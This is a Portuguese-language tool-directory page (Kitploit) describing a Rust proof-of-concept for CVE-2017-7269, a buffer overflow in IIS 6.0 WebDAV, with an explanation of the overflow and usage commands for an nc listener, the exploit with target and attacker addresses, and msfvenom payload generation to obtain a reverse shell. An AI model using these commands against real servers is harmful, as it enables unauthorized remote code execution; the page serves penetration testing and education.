Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-7269 — Uma implementação em Rust do POC para CVE-2017-7269, visando o serviço WebDAV no Microsoft Internet Information Services (IIS) 6.0. | Kitploit
Ferramentas/GitHubGitHub/nika0x38/cve-2017-7269
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubnika0x38/cve-2017-7269

CVE-2017-7269

Uma implementação em Rust do POC para CVE-2017-7269, visando o serviço WebDAV no Microsoft Internet Information Services (IIS) 6.0.

Ver Repositório
12há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2017-7269 - Estouro de Buffer no WebDAV do IIS 6.0

RustSecurity

Uma implementação em Rust do POC para CVE-2017-7269, visando o serviço WebDAV no Microsoft Internet Information Services (IIS) 6.0.

Visão Geral da Vulnerabilidade

CVE-2017-7269 é uma vulnerabilidade crítica de estouro de buffer baseado em pilha encontrada no serviço WebDAV do Microsoft IIS 6.0, que foi fornecido com o Windows Server 2003 R2. Uma exploração bem-sucedida permite que um atacante não autenticado execute código remotamente no servidor alvo.

Detalhes Técnicos

  • Componente Vulnerável: httpext.dll (Extensão WebDAV do IIS)
  • Função Vulnerável: ScStoragePathFromUrl
  • : Uma requisição HTTP especialmente criada.
Gatilho
PROPFIND
  • Vetor de Ataque: Um cabeçalho If: excessivamente longo contendo múltiplas URLs.
  • Descrição

    A vulnerabilidade é um clássico estouro de buffer de pilha. Ela é desencadeada quando a função ScStoragePathFromUrl processa uma requisição PROPFIND contendo um cabeçalho If: malicioso.

    Este exploit cria um cabeçalho com uma longa sequência de bytes, que estoura o buffer alocado na pilha. Esse estouro sobrescreve dados críticos da pilha, incluindo o endereço de retorno salvo (EIP). O exploit sequestra o fluxo de execução do programa apontando esse endereço de retorno para um pequeno payload inicial de shellcode também localizado dentro do cabeçalho malicioso. O trabalho desse shellcode de primeiro estágio é encontrar e executar o payload principal, um shell reverso, que é enviado no corpo da mesma requisição HTTP. Este POC demonstra com sucesso a execução remota de código ao conectar um shell cmd.exe de volta a um listener controlado pelo atacante.

    Uso

    Exemplo 1: Shell reverso embutido

    1. Prepare um listener (ajuste a porta para corresponder a --lport):

      root@kitploit:~
      nc -lvnp <attacker-port>
      
    2. Execute o exploit com shellcode embutido:

      root@kitploit:~
      cargo run --release -- --rhost <target-ip> --rport <target-port> --lhost <attacker-ip> --lport <attacker-port>
      

      A ferramenta corrige o shellcode WSA em tempo real usando LHOST/LPORT e o entrega no corpo HTTP. Quando o alvo está vulnerável, seu listener receberá um shell reverso do cmd.exe.

    Exemplo 2: Payload externo mas não recomendado (--payload)

    1. Crie um payload bruto

      root@kitploit:~
      msfvenom -p windows/exec CMD=whoami -f raw -o payload.bin
      
    2. Entregue o payload (não é necessário --lhost/--lport porque o shellcode já codifica essa informação):

      root@kitploit:~
      cargo run --release -- --rhost <target-ip> --rport <target-port> --payload payload.bin
      
    3. Lide com o callback no mesmo listener de antes. Como o binário simplesmente transmite os bytes fornecidos, o comportamento exato depende do payload que você gerou.

    Aviso Legal

    Esta ferramenta é apenas para fins educacionais e de teste de penetração autorizado. Use com responsabilidade e apenas em sistemas que você possui ou tem permissão explícita.

    Baixar ferramenta